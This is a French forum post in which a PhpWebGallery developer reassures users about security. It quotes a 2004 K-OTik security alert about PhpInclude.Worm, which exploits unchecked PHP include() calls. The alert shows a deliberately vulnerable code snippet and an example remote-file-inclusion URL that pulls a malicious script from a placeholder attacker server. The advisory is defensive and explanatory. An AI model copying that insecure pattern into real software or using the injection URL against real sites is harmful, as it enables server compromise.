Merci Maitre
Je vais essayer de rassurer tout de suite les utilisateurs : c'est le genre d'erreur de programmation qui a été corrigé entre la 1.0 et la 1.0.1. Depuis cette lointaine époque, je n'ai pas été mis au courant de bug de sécurité de ce type.
Si un utilisateur trouve une faille dans PhpWebGallery, merci de me le faire savoir le plus vite possible, un correctif sera mis à disposition ainsi qu'une nouvelle version de correction de bug.
Le nouveau ver PhpInclude.Worm se propage activement sur internet, il s'attaque à toute page dynamique non sécurisée. [Ce ver est détecté par certains antivirus comme étant la variante C ou E de Santy. Nous estimons que ce ver est totalement différent de la famille Santy (la seule similitude réside dans l'utilisation des moteurs de recherche), nous avons donc décidé de lui attribuer l'alias "PhpInclude.Worm"].
Contrairement à Santy, PhpInclude.Worm n'exploite pas les vulnérabilités phpBB, il exploite une palette plus large de failles dites "de programmation". Il recherche (via Google/Yahoo/AOL) des serveurs web dont les pages php utilisent les fonctions "include()" et "require()" de façon non-sécurisée. Comment ?
Ces fonctions sont normalement utilisées par les programmeurs afin d'inclure des pages web spécifiées en arguments. Malheureusement, la non vérification de ces arguments peut permettre l'inclusion et l'exécution de fichiers externes, et donc la compromission du serveur web :
-------- Exemple : vulnerable.php --------
if(isset($page))
{
include($page);
}
-----------------------------------------------
La page ci-dessus ne filtre pas correctement la variable $page, elle permet donc l'inclusion puis l'exécution de scripts arbitraires distants :
vulnerable.php?page=http://server_pirate/scriptmalicieux?cmd=commandes_malicieuses
PhpInclude.Worm recherche donc des pages du type "*.php?*=", puis tente d'y injecter différentes commandes permettant l'installation de robots IRC et la constitution d'une armée de machines zombies.
Ces failles courantes sont liées aux applications web et non pas à la plateforme ou à la version de PHP, d'où un risque qualifié d'Elevé par K-OTik Security.
Solution
Vérifier vos scripts php afin d'y détecter d'éventuelles vulnérabilités.
Références
http://www.k-otik.com/exploits/20041225 … deWorm.php
ChangeLog
26-12-2004 (18h50) : Version Initiale
AUTRES ARTICLES :
- Alerte - PhpInclude.Worm s'attaque aux pages PHP insécurisées
- Alerte - Identification de plusieurs failles non patchées sous Windows
- Alerte - Le ver Santy s'attaque aux sites hébergeant un forum phpBB
- Zafi.D se propage en tentant de se faire passer pour une carte de Noël
- Augmentation significative du nombre de scans contre le port 42
- Microsoft annonce la liste des correctifs de décembre - Quel intérêt ?
- Le site web de SCO victime d'une nouvelle attaque pirate
- Alerte - Attaques multiples via la faille IFRAME d'Internet Explorer
- Apparition et propagation d'une nouvelle variante du ver Sober
- Oracle adopte un cycle trimestriel pour les patchs de sécurité